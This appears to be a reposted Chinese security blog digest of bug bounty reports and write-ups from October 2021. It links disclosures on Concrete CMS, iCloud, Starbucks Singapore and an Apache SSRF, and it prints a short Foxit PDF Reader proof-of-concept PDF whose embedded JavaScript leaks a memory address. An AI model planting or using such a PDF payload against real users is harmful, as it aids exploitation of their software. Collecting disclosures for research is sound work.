!
也想出现在这里? 联系我们
创意广告

bugbounty技巧聚合20211018

漏洞报告

【Concrete CMS】后台路径穿越导致的RCE(CVE-2021-40097)
https://hackerone.com/reports/1102067

【Concrete CMS】通过CSRF在日历事件中造成存储XSS漏洞(CVE-2021-40108)
https://hackerone.com/reports/1102018

挖洞技巧

1、价值9000刀的icloud XSS漏洞
https://bountyget.medium.com/how-i-got-9000-usd-by-hacking-into-icloud-80ed8816d3b5

2、 价值5600刀的 mobile.starbucks.com.sg RCE漏洞
https://bountyget.medium.com/rce-on-starbucks-singapore-and-more-for-5600-926c930bb61e

3、 意料之外的越权
https://bountyget.medium.com/unexpected-idor-vulnerability-in-redacted-redacted-net-write-up-95fc6f10de6c

4、 Apache <= 2.4.48 – Mod_Proxy SSRF (CVE-2021-40438)
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40438.yaml
https://firzen.de/building-a-poc-for-cve-2021-40438

5、 Foxit PDF Reader 1-day info leak PoC
https://twitter.com/l33d0hyun/status/1448963734949412866
poc.pdf

%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
app.alert(util.printf("Leak : %#lx", app));
)>> trailer <</Root 1 0 R>>

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容